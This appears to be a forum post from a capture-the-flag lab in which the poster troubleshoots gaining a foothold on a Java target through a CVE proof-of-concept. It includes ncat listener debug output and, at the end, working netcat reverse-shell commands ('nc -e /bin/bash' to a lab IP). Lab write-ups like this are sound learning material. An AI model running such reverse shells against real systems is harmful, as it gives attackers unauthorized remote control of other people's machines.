To get an initial foothold I’ve tried multiple different CVEs:
The Java one with the interface will execute a few commands like ls, but for even something as simple as cd it returns “Not executed for security reason”.
Of course first I tried a barebones /dev/tcp bash reverse shell; that wouldn’t work.
A netcat reverse shell DID connect, and I’ve tried searching to figure out what the issue is. The beginning of the connection looks like this, but it will not take a command:
Ncat: Version 7.93 ( Ncat - Netcat for the 21st Century )
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on :::8080
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:8080
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
Ncat: Connection from 10.129.14.105.
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 10.129.14.105:58180.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
Looks like others have had the netcat issue and said it has something to do with the JDK version, but it did the same thing for me with a Python script…?
EDIT #2:
For anyone having similar issues: it was NOT the CVE PoC that was at fault for not giving me the shell. So here I learned to use full paths for your shell executable.
Not really a spoiler, but this gives the specific reverse shell command that worked for me:
nc 10.10.10.10 9001 -e bash
and MANY other reverse shell options wouldn’t work;
nc -e /bin/bash 10.10.10.10 9001
however worked perfectly!